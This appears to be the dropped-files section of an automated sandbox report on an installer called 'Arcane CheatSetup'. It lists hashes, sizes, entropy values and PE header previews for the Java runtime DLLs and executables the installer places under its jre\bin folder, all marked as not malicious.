                                Entropy (8bit):6.165546757090391
                                Encrypted:false
                                SSDEEP:6144:vxDvEpBGH7t7PB7Es7va/QdqOBYswIprNWhk+URpxfu4w7J:tvEpBGH7pN57vwQd6swIp5WhkRlfu4CJ
                                MD5:767BBA46789597B120D01E48A685811E
                                SHA1:D2052953DDE6002D590D0D89C2A052195364410A
                                SHA-256:218D349986E2A0CD4A76F665434F455A8D452F1B27EAF9D01A120CB35DA13694
                                SHA-512:86F7F7E87514DBC62C284083D66D5F250A24FC5CD7540AF573C3FB9D47B802BE5FFBBC709B638F8E066AB6E4BB396320F6E65A8016415366799C74772398B530
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......j..'..{t..{t..{t.g.t).{t#..t-.{t#..t".{t#..t".{t#..t,.{tS..ty.{t.8.t".{t..zt..{tS..t/.{t#..t/.{tS..t/.{tRich..{t................PE..L...oPjW...........!.....V...........=.......p.....m.........................P............@.............................^...............................@.... ..h'......................................@............p...............................text....T.......V.................. ..`.rdata...j...p...l...Z..............@..@.data.... ..........................@....rsrc...............................@..@.reloc..h'... ...(..................@..B........................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\gstreamer-lite.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):514112
                                Entropy (8bit):6.805344203686025
                                Encrypted:false
                                SSDEEP:12288:Y5JbfdT5NYGe8m51QSWvopH1kdMDbA2ZoNnYX:Y5JV7eB3KopvnAe2YX
                                MD5:8D0CE7151635322F1FE71A8CEA22A7D6
                                SHA1:81E526D3BD968A57AF430ABB5F55A5C55166E579
                                SHA-256:43C2AC74004F307117D80EE44D6D94DB2205C802AE6F57764810DEE17CFC914D
                                SHA-512:3C78C0249B06A798106FEAF796AA61D3A849F379BD438BF0BB7BFED0DC9B7E7EA7DE689BC3874ED8B97FF2B3BA40265DED251896E03643B696EFDBF2E01AC88C
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Es.J$..J$..J$....N$..Gv..I$..Gv.G$..Gv..G$..Gv..H$..7]..%$.....B$..7]..H$..J$...%..7]..K$..Gv.K$..7].K$..RichJ$..........PE..L...pPjW...........!................g..............m......................................@..........................F.......I..........................@.......lT...................................E..@............................................text............................... ..`.rdata..............................@..@.data....0...`..."...D..............@....rsrc................f..............@..@.reloc..lT.......V...j..............@..B........................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\hprof.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):132672
                                Entropy (8bit):6.708436670828807
                                Encrypted:false
                                SSDEEP:3072:HGBc2vf2AWlvx+Kre9vVv3CoLORljxWEXyB/NK3GyNf9:mxvffVvyo0X8NKW+1
                                MD5:6376B76728E4A873B2BB7233CBCD5659
                                SHA1:3BE08074527D5B5BC4A1DDCEC41375E3B3A8A615
                                SHA-256:4FDF86D78ABC66B44B8AFF4BBCE1F2A5D6D9900767BE3CAAE450409924DBC5AD
                                SHA-512:955E7C5AB735183B491A753710B6F598A142A2876DDAE5AD301C3DA82A65CE82238E0F20C9F558F80138D58F8DC00B4EBD21483CEED0AABEEDA32CCA5D2E3D48
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........vu^............8Y...............................o..............................................Rich............................PE..L...oPjW...........!.....z...x......_..............m......................... ......^.....@.............................i...|...d.......................@........................................... ...@...............d............................text...Ny.......z.................. ..`.rdata...N.......P...~..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\instrument.dll (copy)

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):115776
                                Entropy (8bit):6.787384437276838
                                Encrypted:false
                                SSDEEP:1536:0LHPDcdivqC4xMfl/hAxfZ/t0QHQIM7iVxoQCpGlyir0wIOfnToIfemrVZQirM:0rPDco4xMNEfZ1LQG4igmvTBfem7QcM
                                MD5:AB6ED0CFD0C52DBEDE1BE910EFA8A89B
                                SHA1:83CBC2746A50C155261407ECE3D7A5C58AAD0437
                                SHA-256:8A6FBB08E0F418A3BB80CC65233E7270C820741DD57525ED7FD3CC479A49396E
                                SHA-512:41773183FC20E42BF208064163AA55658692B9221560146E4F6A676F96FC76541ED82F1EFDFA31F8C25BA42F271F7D9087DE681DA937BBF0EB2C781E027F1218
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........g0...c...c...c..c...c...c...cP..c...c.|.c...c.|.c...c.|.c...c.|.c...c.|.c...c.|.c...cRich...c........PE..L...oPjW...........!........................0.....m......................................@.........................@.......|...(.......................@...........p1.............................. ...@............0..0............................text...L........................... ..`.rdata...f...0...h..................@..@.data....,..........................@....rsrc...............................@..@.reloc..Z...........................@..B................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-069DQ.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):132672
                                Entropy (8bit):6.708436670828807
                                Encrypted:false
                                SSDEEP:3072:HGBc2vf2AWlvx+Kre9vVv3CoLORljxWEXyB/NK3GyNf9:mxvffVvyo0X8NKW+1
                                MD5:6376B76728E4A873B2BB7233CBCD5659
                                SHA1:3BE08074527D5B5BC4A1DDCEC41375E3B3A8A615
                                SHA-256:4FDF86D78ABC66B44B8AFF4BBCE1F2A5D6D9900767BE3CAAE450409924DBC5AD
                                SHA-512:955E7C5AB735183B491A753710B6F598A142A2876DDAE5AD301C3DA82A65CE82238E0F20C9F558F80138D58F8DC00B4EBD21483CEED0AABEEDA32CCA5D2E3D48
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........vu^............8Y...............................o..............................................Rich............................PE..L...oPjW...........!.....z...x......_..............m......................... ......^.....@.............................i...|...d.......................@........................................... ...@...............d............................text...Ny.......z.................. ..`.rdata...N.......P...~..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-0TC1S.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):27712
                                Entropy (8bit):6.6264206752006825
                                Encrypted:false
                                SSDEEP:768:hgWe1DWI+mB7JkJKe3xVF2XNbuHEqe8yIGn3zY9pcQ/oGmEsg0sqkgiHmNs2Qd6X:qWbEK1Ms2dYJG
                                MD5:6280201C1918EA3293919BB282D2B563
                                SHA1:3F6F5299A435E2A0C36BE8AAD4CB2FCAACD0897D
                                SHA-256:0711127A297E4CC1927D77013FC040CAA26930C34A4C7B4D7631BCE9C8041B74
                                SHA-512:A4C4507ED4FDEC038FAFA62970161E7B75FF9A2ABBDF854ED55483144DCDC0FC9D21235FDDDF1B38303723F9C615AE388397C4D17B5391D8827A5B40AC52C5FC
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............q...q...q.......q.......q.......q...q...q....=..q....<..q.......q.......q.......q..Rich.q..........................PE..L....PjW...........!.....6...$.......?.......P.....o................................p;....@.........................0Y.......S.......p...............T..@.......0....Q...............................R..@............P...............................text...f4.......6.................. ..`.rdata.......P.......:..............@..@.data...L....`.......J..............@....rsrc........p.......L..............@..@.reloc...............P..............@..B................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-11A56.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):970912
                                Entropy (8bit):6.9649735952029515
                                Encrypted:false
                                SSDEEP:12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
                                MD5:034CCADC1C073E4216E9466B720F9849
                                SHA1:F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
                                SHA-256:86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
                                SHA-512:5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S9...XlA.XlA.XlA..A.XlA.XmA.XlAQ..A.ZlAQ..AvXlAQ..A!XlAQ..A.XlAQ..A.XlAQ..A.XlAQ..A.XlARich.XlA........PE..L....|OR.........."!................D............................................... .....@.........................`........R..(....p...................>......d]..@...8...........................H...@............P...............................text............................... ..`.data...4e.......V..................@....idata.......P......................@....rsrc........p.......0..............@..@.reloc..d].......^...4..............@..B................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-162RA.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):177216
                                Entropy (8bit):6.909590121652277
                                Encrypted:false
                                SSDEEP:3072:L9Wyo+Jyru3w8WqWnJjOUrI7vh+Dug9PVWU+kmaVE9TBfQiJ8:BWyPsi34i+DugFj+kmaVE9TB4/
                                MD5:8DC2356E3FF3A595AEDE81594A2D259A
                                SHA1:A05E05E9EA8FB0C8928112CA931EB4F5E977B92A
                                SHA-256:B9DE5D3ABBC0AC956E7F590E4C8507FF570B6C353374BB80F413B5846CE322FE
                                SHA-512:D5C83EBDB7192DD361856B236A07AFD4FF95E68E0036396D68A3407ED680D4A36EC857AB101DBA5F583AA67CC45A2835178DAC84A68472C7F619EFA674FE51F0
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................8h....z.l.....8j.....8_......_......g.......h....8^......8o.....8n.....8i....Rich...........................PE..L...pPjW...........!...............................o......................................@.........................`...........P.......................@...........`...................................@...............D...|...@....................text............................... ..`.rdata..]...........................@..@.data....1..........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-17AF0.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):82496
                                Entropy (8bit):6.597347722250847
                                Encrypted:false
                                SSDEEP:1536:ez2dfBusTTkMffX+xR5kdt94u+508AqDfJOqsbCkq24maADX:kE5u+kkX+P+dt9O08JJOZXX4nADX
                                MD5:5F85F7F2DFAC397D642834B61809240F
                                SHA1:ECA28E8464208FA11EF7DF677B741CDD561483D9
                                SHA-256:B71E00ADB77D87882D58993A5888955BDD62C57D364F60AAA0FA19D32A69C9DA
                                SHA-512:2BFE9FCE450E57EA93DEEAA85A746CB17BA946EEFF866F10D67C74F7EA038B16910E0D8EF29E9F358AF7DAABD45E3983C370FEF82A9647546819DCDE3AEE45BC
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-..C..C..C.....C..3..C.v...C..3..C..B.X.C.....C..3..C..3...C..3..C..3..C.Rich.C.........PE..L....HjW............................1.............@.................................cE....@.................................\...x....`..H............*..@....p..h.......................................@............................................text............................... ..`.rdata...C.......D..................@..@.data....0... ......................@....rsrc...H....`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-1D9V4.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):163904
                                Entropy (8bit):6.783788147675078
                                Encrypted:false
                                SSDEEP:3072:XrQPwE5tlGsXVomHvD+1febSICzqozXtrQwnNZkB+5:XU15tpX9HvsfrTtMwNWBY
                                MD5:6E08D65F5CBB85E51010F36A84FC181D
                                SHA1:4EEE8BE68BAAF6320AEA29131A1C0B322F09F087
                                SHA-256:2D8658909D9E357A4B70FCF862D690EEC82A2F77161ABB021E0839C6A67D4825
                                SHA-512:DF4494D062E9A8AC82D727D2722DCF32C3FC924FA104F384FA099ADB08ECBDEEA7A19245D779097C0AFCF51F84852328ED595C88380F42BD39560678C8AD9621
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........#..cp..cp..cp...p..cp...p..cp.D.p..cp..bp..cp.D.p..cp.D.p..cp.D.p..cp.D.p..cp.D.p..cp.D.p..cpRich..cp........................PE..L...{PjW...........!...............................m......................................@......................... ?..h...|9..<....P...............h..@....`...)..@...............................(8..@...............,............................text............................... ..`.rdata..._.......`..................@..@.data...0....@.......4..............@....rsrc........P.......8..............@..@.reloc...+...`...,...<..............@..B........................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-1EODK.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):178240
                                Entropy (8bit):6.793245389378621
                                Encrypted:false
                                SSDEEP:3072:gWosiKTxga2KtpdhEnGF5PNyR0BxDxxKF5HkEWnuYsauj9Fom1QB:3RRKAtpdhEn/0BzwFpvYm0z
                                MD5:BF299F73480AF97A750492E043D1FADD
                                SHA1:C93C4A2DAE812F31603E42D70711D3B6822F9E8E
                                SHA-256:0334E3B7AE677116B92516172D0CA905723DAF847D8B3B0DC3FC118EDC703D51
                                SHA-512:7265783F0DD653DBC4693D5EFEB156281620C5421F29910F14C22B75A936233E9E897087E64B641335795484837F28F113EE9F380027698A898F19115FD0F648
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........:..di..di..di.k.i..di.k.i..di...i..di.k.i..di..ei..di.k.i..di.k.i..di.k.i..di.k.i..diRich..di................PE..L...pPjW...........!.....^...F.......g.......p.....o.................................Z....@.............................d....x..P.......h...............@....... ...`q..............................pw..@............p..H............................text....\.......^.................. ..`.rdata.......p.......b..............@..@.data................v..............@....rsrc...h...........................@..@.reloc.. ...........................@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-1NNTS.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):52800
                                Entropy (8bit):6.367562931371078
                                Encrypted:false
                                SSDEEP:768:0UD9dxWf4b4UoY6sUsaJ2sQ7O+phclByW3T9KMDbgz2dN6lDb/9/YMw0c3D6QsTY:0IofovBbS9KMvHR0cz6QsTPOXm2BT9j7
                                MD5:F434A8AC7F1C8C0E2587B9A9F30E397B
                                SHA1:BD62E10E44117A60EB4180412112593D9460299D
                                SHA-256:6A994B389B8F7109238DE6F230B1B540186ED2EC8D081C7601C6996863AA4DC8
                                SHA-512:9896DAC36BD4F7289C7701B75AD8EB9F7ACD233384075A3FBA6E6F2F38E420F37C1A29317EEEA3C4DDBA1791F6F17187DD5BDFDD9F98F095E7D4DF20C0D5EA3E
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Hi.m...>...>...>..u>...>.Fq>...>..w>...>..C>...>.pj>...>.pz>...>...>...>c~B>...>..B>...>..s>...>..t>...>Rich...>........PE..L....HjW.................f...R.......i............@.................................._....@.....................................x.......................@.......X...@...............................P...@...................`........................text....e.......f.................. ..`.rdata...5.......6...j..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-23BHM.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.466364086630595
                                Encrypted:false
                                SSDEEP:384:Gpss5cnn6vmSHhV8TI1ee84SzK8nYPLr7HuY:Gps7nnS/8Tte8tC7HuY
                                MD5:12B6E1C3205A8B17AC20E00A889DFC43
                                SHA1:42458CFA7135858ACEF10803B87A208FA7E66413
                                SHA-256:EAEA20A794EC6BB15808EF278376A87CF91F9BE15FE6A7DE92014AC4BF75555D
                                SHA-512:174703820636DED2BA081420A8D1E37D67FDA6C13AC406C2F08E16DCF0C7B7D9642E37BC888802B50ED3438D6029C4FECCD7C151B82CF9A91F13F36C4A0B2019
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW............................|........ ....@..........................`......r.....@.................................4#..P....@..H............&..@....P....... ...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...H....@......................@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-2KSRS.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.476844183458217
                                Encrypted:false
                                SSDEEP:384:Gpsw5cnL6U0mSHhV89+ee84SzSFnYPLr7KTdK:Gps/nHpS/89je80C7KQ
                                MD5:B4AD335E868693F009B7644E2ED555C1
                                SHA1:ECCB9711CF78BCD5BD78231A838B1852764B301C
                                SHA-256:CCA46A54A1A9CE78F7FFC49D195C4AB970AD540B5FCB2B6D9BF57EEDF38EC28D
                                SHA-512:04A4670345B47C5B256220A85FFC68A1DD6DFE8D44838A4C634EB0EBC469EFC307B0BCF838AA1244634A315F365518B1633586B872C6D459EE80374D14234CA4
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW............................|........ ....@..........................`......{.....@.................................4#..P....@..H............&..@....P....... ...............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...H....@......................@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-3CGHC.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):57408
                                Entropy (8bit):6.6711491011490285
                                Encrypted:false
                                SSDEEP:1536:f6arRmcnq2lxm+Na6C7HIT6T8E2pLSSm3:fzm+q7HITS8E2pLSSA
                                MD5:AEADA06201BB8F5416D5F934AAA29C87
                                SHA1:35BB59FEBE946FB869E5DA6500AB3C32985D3930
                                SHA-256:F8F0B1E283FD94BD87ABCA162E41AFB36DA219386B87B0F6A7E880E99073BDA3
                                SHA-512:89BAD9D1115D030B98E49469275872FFF52D8E394FE3F240282696CF31BCCF0B87FF5A0E9A697A05BEFCFE9B24772D65ED73C5DBD168EED111700CAAD5808A78
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................I2.......(.......*.....................\.:.....\.>...............................)...............+.....Rich............PE..L...tPjW...........!.....r...V.......w.............m......................................@.........................@...x...............................@.......8.......................................@...............4............................text....p.......r.................. ..`.rdata...@.......B...v..............@..@.data...............................@....rsrc...............................@..@.reloc..8...........................@..B................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-3TU72.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15936
                                Entropy (8bit):6.466457942735197
                                Encrypted:false
                                SSDEEP:384:GpsbHnDiW6gejmSHhV8cGees7snYPLr7Wj53:GpsbHn/HS/8cresgC743
                                MD5:CF2F023D2B5F0BFB2ECF8AEEA7C51481
                                SHA1:6EB867B1AC656A0FC363DFAE4E2D582606D100FB
                                SHA-256:355366D0C7D7406E2319C90DF2080C0FAE72D9D54E4563C48A09F55CA68D6B0C
                                SHA-512:A2041925039238235ADC5FE8A9B818DFF577C6EA3C55A0DE08DA3DEDD8CD50DC240432BA1A0AEA5E8830DCDCCD3BFBF9CF8A4F21E9B56DC839E074E156FC008D
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW..................................... ....@..........................`......B.....@..................................#..P....@..\............&..@....P....... ...............................!..@............ ...............................text............................... ..`.rdata..z.... ......................@..@.data........0......................@....rsrc...\....@......................@..@.reloc.......P.......$..............@..B........................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-4UUQJ.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):16448
                                Entropy (8bit):6.380289288441742
                                Encrypted:false
                                SSDEEP:384:GpsCgvnvId6YmSHhV85AeencGtnYPLr7Vz:GpsDngGS/851ebC7Vz
                                MD5:7DA6AA3CC4763C6F9C20B43E6C9A9547
                                SHA1:3F28CF8E6AAD199DCC621F2A2C8AD50126813B05
                                SHA-256:F7375AD07F0BE6FD75E822A9ECFF5ACA073DB03B95894C05C7657BEC7AF59AF4
                                SHA-512:7948EAA11B4026F9975B6CC4225A4C0B617341299364196F3825EEF4484A6EEB529319BF4F6D19436689083C36BF1F6B9880574764612FC900C8CC1D73EED1BB
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R%^.<v^.<v^.<vW..v\.<vEx.v_.<vEx.v\.<vEx.v[.<v^.=vo.<vEx.vJ.<vEx.v_.<vEx.v_.<vRich^.<v........PE..L....DjW............................z........ ....@..........................`......1.....@..................................#..P....@..H............(..@....P....... ..............................h"..@............ ...............................text............................... ..`.rdata..*.... ......................@..@.data........0......................@....rsrc...H....@......................@..@.reloc.......P.......&..............@..B........................................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-4VJ8E.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):1182272
                                Entropy (8bit):6.63089480914076
                                Encrypted:false
                                SSDEEP:24576:68M4H6ioDs5FELnSbY6Ck2IlAnVCXQlFg3:9eaGnkXQlFQ
                                MD5:159CCF1200C422CED5407FED35F7E37D
                                SHA1:177A216B71C9902E254C0A9908FCB46E8D5801A9
                                SHA-256:30EB581C99C8BCBC54012AA5E6084B6EF4FCEE5D9968E9CC51F5734449E1FF49
                                SHA-512:AB3F4E3851313391B5B8055E4D526963C38C4403FA74FB70750CC6A2D5108E63A0E600978FA14A7201C48E1AFD718A1C6823D091C90D77B17562B7A4C8C40365
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Q.Q...?...?...?......?.......?.......?.z...?.......?.......?...>.;.?.....s.?.....w.?.......?.......?.......?.Rich..?.........................PE..L...nPjW...........!................,G.............m.........................P......Y.....@.................................,{...........N..............@....P......................................v..@............... ....V..`....................text...<........................... ..`.rdata.............................@..@.data...8....@...~...2..............@....rsrc....N.......P..................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-5VJPG.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):207424
                                Entropy (8bit):6.630800216665857
                                Encrypted:false
                                SSDEEP:6144:ckZ5ktGCru8e6Y3RhNw0mjs+OBS7n7ACKRAHbW:ciIbS6Y37Nw0/QC
                                MD5:475DD87198F9C48EFB08AAB4ADE8AF5A
                                SHA1:9B657E0837639663D4D721F8C5E25401F11E7BEB
                                SHA-256:32764005FCCE7D0E51801528F6B68C860979E08D027A5220DFEC19B2A8013354
                                SHA-512:0B492B0FBADC14178A6F79A58E47C30D92B59B18414E38A7B119699D0788ACF3713F925CF0EC570BE3E29AB26BDB6B567C38526BC0603BA78ECC3E2952EA3E2B
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.*...*...*.......*.......*.;....*.......*.......*...+...*.......*.......*.......*.......*.......*.......*.Rich..*.........................PE..L....PjW...........!.........>.....................o.........................P............@.............................................................@......../...................................C..@...............|...........................text.../........................... ..`.rdata..............................@..@.data....,.......&..................@....rsrc...............................@..@.reloc...6.......8..................@..B........................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-6EJKR.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):23616
                                Entropy (8bit):6.620094371728742
                                Encrypted:false
                                SSDEEP:384:Qp2dG5pC/ujTc8ZrEnrZm8WXLFnPV52WZQAnYPLr7lOGa:uvCGjJ0Q9ndRZdC71a
                                MD5:1C47DD47EBD106C9E2279C7FCB576833
                                SHA1:3BA9B89D9B265D8CEC6B5D6F80F7A28D2030A2D1
                                SHA-256:58914AD5737F2DD3D50418A89ABBB7B30A0BD8C340A1975197EEA02B9E4F25B2
                                SHA-512:091F50B2E621ED80BAFE2541421906DE1BCC35A0E912055B93E40CD903BE8B474103C0D8FECDF46E7F2F3C44BDADE64A857AB2B9CB5404306055150EE4ED002A
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2..v...v...v.....+.t...m'$.u...v...\...m'&.w...m'..t...m'..{...m'#.w...m'".w...m'%.w...Richv...................PE..L...wPjW...........!.....*...........4.......@.....m................................F.....@..........................I..|....E..<....`...............D..@....p.......@...............................D..@............@...............................text....).......*.................. ..`.rdata.......@......................@..@.data...(....P.......:..............@....rsrc........`.......<..............@..@.reloc..^....p.......@..............@..B........................................................................................................................................................................................................................................................................................................................

                                C:\Program Files (x86)\Arcane Cheat\jre\bin\is-6IE0O.tmp

                                Download File
                                Process:C:\Users\user\AppData\Local\Temp\is-R8U9P.tmp\Arcane CheatSetup.tmp
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):19008
                                Entropy (8bit):6.372096409611824
                                Encrypted:false
                                SSDEEP:384:PTjlu57T5J5eFeYW7TPVlN3B+ASZQ4NNR7F3qnYPLr7om0:PnUd5eFeDfd5Sj7oC7om0
                                MD5:4023E25F92B5F13E792901BF112A8EA2
                                SHA1:31ADCD411905832B89EA55DEC8B9C83AF3C7D3EA
                                SHA-256:432AEDAC59FA161FED5A5D95CA5F8CFD1D73A35ABE8A7090D137100F727B687B
                                SHA-512:AD0E6F8071EB09E843989E637BACA988DD7706D84FC26DB7C2E18BBE03A78A6C5BFE4F1B28289B5929B2B86C53FB6C3DAE42523DC8EDE8057A8F431AEA77BB20
                                Malicious:false
                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............~fQ.~fQ.~fQ...Q.~fQ...Q.~fQ...Q.~fQ...Q.~fQ.~gQ.~fQ...Q.~fQ...Q.~fQ...Q.~fQ...Q.~fQ...Q.~fQRich.~fQ................PE..L....PjW...........!.........................0.....o.........................p.......8....@..........................8......43..P....P...............2..@....`.......1..............................P1..@............0.......2..@....................text............................... ..`.rdata..T....0......................@..@.data........@.......&..............@....rsrc........P.......*..............@..@.reloc..J....`......................@..B................................................................................................................................................................................................................................................................................................................

